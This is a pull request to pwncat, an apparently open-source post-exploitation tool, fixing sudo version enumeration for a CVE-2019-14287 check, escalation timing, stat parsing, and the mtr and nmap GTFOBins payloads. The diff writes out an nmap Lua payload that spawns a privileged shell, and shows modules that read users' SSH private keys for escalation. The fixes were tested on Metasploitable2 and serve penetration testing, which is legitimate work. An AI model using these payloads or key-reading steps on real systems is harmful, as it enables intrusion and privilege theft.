### PR TITLE
Fixed sudo version enumeration

### DIFF
--- a/pwncat/commands/escalate.py
+++ b/pwncat/commands/escalate.py
@@ -1,4 +1,5 @@
 #!/usr/bin/env python3
+import time
 
 from pwncat.util import console
 from pwncat.modules import ModuleFailed
@@ -38,6 +39,7 @@ class Link:
         if self.escalation.type == "escalate.replace":
             # Exit out of the subshell
             self.old_session.layers.pop()(self.old_session)
+            time.sleep(0.1)
             self.old_session.platform.refresh_uid()
 
     def __str__(self):
@@ -172,6 +174,8 @@ class Command(CommandDefinition):
                     )
                     result = escalation.escalate(manager.target)
 
+                    time.sleep(0.1)
+
                     manager.target.platform.refresh_uid()
 
                     # Construct the escalation link
@@ -209,6 +213,9 @@ class Command(CommandDefinition):
                         task, status=f"attempting {escalation.title(manager.target)}"
                     )
                     result = escalation.escalate(manager.target)
+
+                    time.sleep(0.1)
+
                     manager.target.platform.refresh_uid()
                     link = Link(manager.target, escalation, result)
 

--- a/pwncat/data/gtfobins.json
+++ b/pwncat/data/gtfobins.json
@@ -1491,7 +1491,7 @@
     {
       "type": "read",
       "stream": "print",
-      "payload": "{command} | | while read line; do echo ${line:28:-27}; done",
+      "payload": "{command} | while read line; do echo ${{line:28:-27}}; done",
       "args": [
         "--raw",
         "-F",
@@ -1580,7 +1580,9 @@
       "payload": "TF=$({mktemp}); echo 'os.execute(\"{shell} -p\")' > $TF; {command}; {rm} -f $TF",
       "input": "reset\n",
       "args": [
-        "--script=$TF"
+        "--script=$TF",
+        "-p 1",
+        "127.0.0.1"
       ]
     }
   ],

--- a/pwncat/gtfobins.py
+++ b/pwncat/gtfobins.py
@@ -503,8 +503,9 @@ class GTFOBins:
 
         while True:
             try:
-                target = target.format(**args)
-                break
+                return target.format(**args)
+            except ValueError as exc:
+                raise ValueError(target) from exc
             except KeyError as exc:
                 # The keyerror has the name in quotes for some reason
                 key = shlex.split(str(exc))[0]
@@ -520,5 +521,3 @@ class GTFOBins:
                     raise MissingBinary(key)
                 # Next time, we have it
                 args[key] = value
-
-        return target

--- a/pwncat/modules/linux/enumerate/creds/password.py
+++ b/pwncat/modules/linux/enumerate/creds/password.py
@@ -39,7 +39,7 @@ class Module(EnumerateModule):
 
         # Run the command on the remote host
         proc = session.platform.Popen(
-            command, shell=True, text=True, stdout=pwncat.subprocess.PIPE
+            command, shell=True, stdout=pwncat.subprocess.PIPE
         )
 
         # Iterate through the output
@@ -47,7 +47,7 @@ class Module(EnumerateModule):
             for line in filp:
                 try:
                     # Decode the line and separate the filename, line number, and content
-                    line = line.strip().split(":")
+                    line = line.decode("utf-8").strip().split(":")
                 except UnicodeDecodeError:
                     continue
 

--- a/pwncat/modules/linux/enumerate/escalate/leak_privkey.py
+++ b/pwncat/modules/linux/enumerate/escalate/leak_privkey.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python3
 
-from pwncat.facts import Implant, EscalationReplace
+from pwncat.facts import Implant, PrivateKey, EscalationReplace
 from pwncat.modules import Status, ModuleFailed
 from pwncat.platform.linux import Linux
 from pwncat.modules.enumerate import Schedule, EnumerateModule
@@ -35,7 +35,7 @@ class Module(EnumerateModule):
             authorized = True
 
             try:
-                with ability.open(str(ssh_path / "id_rsa"), "r") as filp:
+                with ability.open(session, str(ssh_path / "id_rsa"), "r") as filp:
                     privkey = filp.read()
             except (ModuleFailed, FileNotFoundError, PermissionError) as exc:
                 yield Status(
@@ -44,7 +44,7 @@ class Module(EnumerateModule):
                 continue
 
             try:
-                with ability.open(str(ssh_path / "id_rsa.pub"), "r") as filp:
+                with ability.open(session, str(ssh_path / "id_rsa.pub"), "r") as filp:
                     pubkey = filp.read()
                 if pubkey.strip() == "":
                     pubkey = None
@@ -55,7 +55,9 @@ class Module(EnumerateModule):
 
             if pubkey is not None and pubkey != "":
                 try:
-                    with ability.open(str(ssh_path / "authorized_keys"), "r") as filp:
+                    with ability.open(
+                        session, str(ssh_path / "authorized_keys"), "r"
+                    ) as filp:
                         authkeys = filp.read()
                     if authkeys.strip() == "":
                         authkeys = None

--- a/pwncat/modules/linux/enumerate/software/sudo/cve_2019_14287.py
+++ b/pwncat/modules/linux/enumerate/software/sudo/cve_2019_14287.py
@@ -1,5 +1,6 @@
 #!/usr/bin/env python3
 from packaging import version
+
 from pwncat.facts import build_gtfo_ability
 from pwncat.modules import ModuleFailed
 from pwncat.gtfobins import Capability
@@ -20,9 +21,9 @@ class Module(EnumerateModule):
 
         try:
             # Utilize the version enumeration to grab sudo version
-            sudo_info = session.run("enumerate", types="software.sudo.version")[0]
+            sudo_info = session.run("enumerate", types=["software.sudo.version"])[0]
         except IndexError as exc:
-            raise ModuleFailed("no sudo version found") from exc
+            return
 
         # This vulnerability was patched in 1.8.28
         if version.parse(sudo_info.version) >= version.parse("1.8.28"):

--- a/pwncat/platform/linux.py
+++ b/pwncat/platform/linux.py
@@ -1553,6 +1553,10 @@ class Linux(Platform):
         #  13 number of blocks allocated
         #  14 total size in bytes
 
+        for i in range(len(fields)):
+            if fields[i] == "?":
+                fields[i] = "0"
+
         stat = os.stat_result(
             tuple(
                 [
@@ -1578,43 +1582,51 @@ class Linux(Platform):
         """Perform the equivalent of the stat syscall on
         the remote host"""
 
-        try:
-            result = self.run(
-                [
-                    "stat",
-                    "-L",
-                    "-c",
-                    "%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o",
-                    path,
-                ],
-                capture_output=True,
-                encoding="utf-8",
-                check=True,
-            )
-        except CalledProcessError as exc:
-            raise FileNotFoundError(path) from exc
+        while True:
+            try:
+                result = self.run(
+                    [
+                        "stat",
+                        "-L",
+                        "-c",
+                        "%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o",
+                        path,
+                    ],
+                    capture_output=True,
+                    encoding="utf-8",
+                    check=True,
+                )
+            except CalledProcessError as exc:
+                raise FileNotFoundError(path) from exc
 
-        return self._parse_stat(result.stdout)
+            try:
+                return self._parse_stat(result.stdout)
+            except IndexError:
+                pass
 
     def lstat(self, path: str) -> os.stat_result:
         """Perform the equivalent of the lstat syscall"""
 
-        try:
-            result = self.run(
-                [
-                    "stat",
-                    "-c",
-                    "%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o",
-                    path,
-                ],
-                capture_output=True,
-                encoding="utf-8",
-                check=True,
-            )
-        except CalledProcessError as exc:
-            raise FileNotFoundError(path) from exc
+        while True:
+            try:
+                result = self.run(
+                    [
+                        "stat",
+                        "-c",
+                        "%n %s %b %f %u %g %D %i %h %t %T %X %Y %Z %W %o",
+                        path,
+                    ],
+                    capture_output=True,
+                    encoding="utf-8",
+                    check=True,
+                )
+            except CalledProcessError as exc:
+                raise FileNotFoundError(path) from exc
 
-        return self._parse_stat(result.stdout)
+            try:
+                return self._parse_stat(result.stdout)
+            except IndexError:
+                pass
 
     def abspath(self, path: str) -> str:
         """Attempt to resolve a path to an absolute path"""


### PR DESCRIPTION
This pull request is for issue #98. The root of this problem was a
typo: missing square braces around enumeration. However, it
also shouldn't have been raising a module failed error in that case.

After fixing that problem, I found a few more bugs while testing
with Metasploitable2, so I fixed those:

- Added small sleeps in escalation to let the shell keep up
- stat behaves oddly, so added a loop to retry on parsing failure
- Fixed the **syntax** of the mtr gtfobins payload
- Fixed the nmap gtfobins payload

The mtr gtfobins payload is still not right, as it is unable to
read files as it should, but I'll work on that moving forward.
For now, there are no exceptions and escalation is working properly
through `nmap`.